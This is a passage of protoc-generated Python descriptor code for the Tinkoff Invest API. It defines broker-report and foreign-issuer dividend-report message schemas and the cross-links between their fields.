full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='task_id', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportRequest.task_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='page', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportRequest.page', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3955,
serialized_end=4010,
)
_GETBROKERREPORTRESPONSE = _descriptor.Descriptor(
name='GetBrokerReportResponse',
full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='broker_report', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse.broker_report', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='itemsCount', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse.itemsCount', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagesCount', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse.pagesCount', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='page', full_name='tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse.page', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4013,
serialized_end=4168,
)
_BROKERREPORT = _descriptor.Descriptor(
name='BrokerReport',
full_name='tinkoff.public.invest.api.contract.v1.BrokerReport',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='trade_id', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.trade_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_id', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.order_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='figi', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.figi', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='execute_sign', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.execute_sign', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='trade_datetime', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.trade_datetime', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='exchange', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.exchange', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='class_code', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.class_code', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='direction', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.direction', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.name', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ticker', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.ticker', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='price', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.price', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.quantity', index=11,
number=12, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_amount', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.order_amount', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='aci_value', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.aci_value', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_order_amount', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.total_order_amount', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='broker_commission', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.broker_commission', index=15,
number=16, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='exchange_commission', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.exchange_commission', index=16,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='exchange_clearing_commission', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.exchange_clearing_commission', index=17,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='repo_rate', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.repo_rate', index=18,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='party', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.party', index=19,
number=20, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='clear_value_date', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.clear_value_date', index=20,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sec_value_date', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.sec_value_date', index=21,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='broker_status', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.broker_status', index=22,
number=23, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='separate_agreement_type', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.separate_agreement_type', index=23,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='separate_agreement_number', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.separate_agreement_number', index=24,
number=25, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='separate_agreement_date', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.separate_agreement_date', index=25,
number=26, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='delivery_type', full_name='tinkoff.public.invest.api.contract.v1.BrokerReport.delivery_type', index=26,
number=27, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4171,
serialized_end=5285,
)
_GETDIVIDENDSFOREIGNISSUERREQUEST = _descriptor.Descriptor(
name='GetDividendsForeignIssuerRequest',
full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='generate_div_foreign_issuer_report', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest.generate_div_foreign_issuer_report', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='get_div_foreign_issuer_report', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest.get_div_foreign_issuer_report', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='payload', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest.payload',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=5288,
serialized_end=5584,
)
_GETDIVIDENDSFOREIGNISSUERRESPONSE = _descriptor.Descriptor(
name='GetDividendsForeignIssuerResponse',
full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='generate_div_foreign_issuer_report_response', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponse.generate_div_foreign_issuer_report_response', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='div_foreign_issuer_report', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponse.div_foreign_issuer_report', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='payload', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponse.payload',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=5587,
serialized_end=5891,
)
_GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST = _descriptor.Descriptor(
name='GenerateDividendsForeignIssuerReportRequest',
full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='account_id', full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequest.account_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='from', full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequest.from', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='to', full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequest.to', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5894,
serialized_end=6041,
)
_GETDIVIDENDSFOREIGNISSUERREPORTREQUEST = _descriptor.Descriptor(
name='GetDividendsForeignIssuerReportRequest',
full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='task_id', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportRequest.task_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='page', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportRequest.page', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6043,
serialized_end=6114,
)
_GENERATEDIVIDENDSFOREIGNISSUERREPORTRESPONSE = _descriptor.Descriptor(
name='GenerateDividendsForeignIssuerReportResponse',
full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='task_id', full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportResponse.task_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6116,
serialized_end=6179,
)
_GETDIVIDENDSFOREIGNISSUERREPORTRESPONSE = _descriptor.Descriptor(
name='GetDividendsForeignIssuerReportResponse',
full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='dividends_foreign_issuer_report', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse.dividends_foreign_issuer_report', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='itemsCount', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse.itemsCount', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagesCount', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse.pagesCount', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='page', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse.page', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6182,
serialized_end=6387,
)
_DIVIDENDSFOREIGNISSUERREPORT = _descriptor.Descriptor(
name='DividendsForeignIssuerReport',
full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='record_date', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.record_date', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='payment_date', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.payment_date', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='security_name', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.security_name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='isin', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.isin', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='issuer_country', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.issuer_country', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.quantity', index=5,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dividend', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.dividend', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='external_commission', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.external_commission', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dividend_gross', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.dividend_gross', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tax', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.tax', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dividend_amount', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.dividend_amount', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='currency', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.currency', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6390,
serialized_end=6975,
)
# --- Descriptor cross-linking (generated by protoc; do not edit by hand) ---
# The Descriptor objects above are constructed with message_type/enum_type
# left as None, because the referenced descriptors may not exist yet at that
# point.  Once all descriptors are built, the cross-references are patched
# in here: timestamps from google.protobuf, MoneyValue/Quotation from the
# common proto, and the locally defined messages/enums.
_OPERATIONSREQUEST.fields_by_name['from'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_OPERATIONSREQUEST.fields_by_name['to'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_OPERATIONSREQUEST.fields_by_name['state'].enum_type = _OPERATIONSTATE
_OPERATIONSRESPONSE.fields_by_name['operations'].message_type = _OPERATION
_OPERATION.fields_by_name['payment'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_OPERATION.fields_by_name['price'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_OPERATION.fields_by_name['state'].enum_type = _OPERATIONSTATE
_OPERATION.fields_by_name['date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_OPERATION.fields_by_name['operation_type'].enum_type = _OPERATIONTYPE
_OPERATION.fields_by_name['trades'].message_type = _OPERATIONTRADE
_OPERATIONTRADE.fields_by_name['date_time'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_OPERATIONTRADE.fields_by_name['price'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['total_amount_shares'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['total_amount_bonds'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['total_amount_etf'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['total_amount_currencies'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['total_amount_futures'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['expected_yield'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_PORTFOLIORESPONSE.fields_by_name['positions'].message_type = _PORTFOLIOPOSITION
_POSITIONSRESPONSE.fields_by_name['money'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_POSITIONSRESPONSE.fields_by_name['blocked'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_POSITIONSRESPONSE.fields_by_name['securities'].message_type = _POSITIONSSECURITIES
_POSITIONSRESPONSE.fields_by_name['futures'].message_type = _POSITIONSFUTURES
_WITHDRAWLIMITSRESPONSE.fields_by_name['money'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
